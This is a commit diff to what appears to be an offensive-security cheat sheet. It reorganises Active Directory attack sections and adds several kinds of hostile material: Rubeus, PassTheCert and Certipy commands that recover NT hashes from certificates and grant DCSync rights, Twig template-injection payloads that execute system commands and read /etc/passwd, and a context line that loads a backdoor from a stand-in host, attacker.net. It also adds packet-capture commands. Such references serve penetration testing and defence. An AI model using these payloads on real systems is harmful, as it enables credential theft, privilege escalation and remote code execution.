Capture a network trace with builtin tools

2024-11-10 07:04:22 +00:00 · 2022-08-15 15:02:29 +02:00 · 2022-08-15 15:02:29 +02:00 · 6650c361e7
commit 6650c361e7
parent 55e05b4b17
3 changed files with 68 additions and 17 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -62,7 +62,6 @@
    - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
      - [Using impacket](#using-impacket)
      - [Using Rubeus](#using-rubeus)
-    - [UnPAC The Hash](#unpac-the-hash)
    - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
    - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
    - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
@ -84,6 +83,7 @@
      - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
      - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
      - [Pass-The-Certificate](#pass-the-certificate)
+    - [UnPAC The Hash](#unpac-the-hash)
    - [Shadow Credentials](#shadow-credentials)
    - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
    - [Abusing DNS Admins Group](#abusing-dns-admins-group)
@ -1915,21 +1915,6 @@ root@kali:~$ klist
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
 ```

-### UnPAC The Hash
-
-* Windows
-    ```ps1
-    # request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
-    C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
-    ```
-* Linux
-    ```ps1
-    # obtain a TGT by validating a PKINIT pre-authentication
-    $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
-    
-    # use the session key to recover the NT hash
-    $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
-    ```

 ### Capturing and cracking Net-NTLMv1/NTLMv1 hashes

@ -2516,6 +2501,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

 #### Pass-The-Certificate

+> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
+
 * Windows
  ```ps1
  # Information about a cert file
@ -2523,6 +2510,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

  # From a Base64 PFX
  Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+
+  # Grant DCSync rights to an user
+  ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid <user_SID>
+  # To restore
+  ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
  ```
 * Linux
  ```ps1
@ -2534,8 +2526,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101

  # PFX certificate (file) + password (string, optionnal)
  gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+
+  # Using Certipy
+  certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
+  certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
  ```

+### UnPAC The Hash
+
+Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
+
+* Windows
+    ```ps1
+    # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
+    Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+    ```
+* Linux
+    ```ps1
+    # Obtain a TGT by validating a PKINIT pre-authentication
+    $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+    
+    # Use the session key to recover the NT hash
+    $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
+    ```
+

 ### Shadow Credentials

--- a/Resources/Network
+++ b/Resources/Network
@ -20,6 +20,7 @@
 * [RevSocks](#revsocks)
 * [plink](#plink)
 * [ngrok](#ngrok)
+* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools)
 * [Basic Pivoting Types](#basic-pivoting-types)
  * [Listen - Listen](#listen---listen)
  * [Listen - Connect](#listen---connect)
@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 # Expose accessible internal service to the internet
 ./cloudflared tunnel --url <protocol>://<host>:<port>
 ```
-  
+
+## Capture a network trace with builtin tools
+
+* Windows (netsh)
+  ```ps1
+  # start a capture use the netsh command.
+  netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
+
+  # stop the trace
+  netsh trace stop
+
+  # Event tracing can be also used across a reboots
+  netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
+
+  # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
+  etl2pcapng.exe c:\trace.etl c:\trace.pcapng
+
+  # Use filters
+  netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
+  ```
+* Linux (tcpdump)
+  ```ps1
+  sudo apt-get install tcpdump
+  tcpdump -w 0001.pcap -i eth0
+  tcpdump -A -i eth0
+
+  # capture every TCP packet
+  tcpdump -i eth0 tcp
+
+  # capture everything on port 22
+  tcpdump -i eth0 port 22
+  ```
+
  
 ## Basic Pivoting Types

@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 * 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
 * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
 * [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
+* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)
--- a/Injection/README.md
+++ b/Injection/README.md
@ -829,6 +829,9 @@ $output = $twig > render (
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{['id']|filter('system')}}
+{{[0]|reduce('system','id')}}
+{{['id']|map('system')|join}}
+{{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
 ```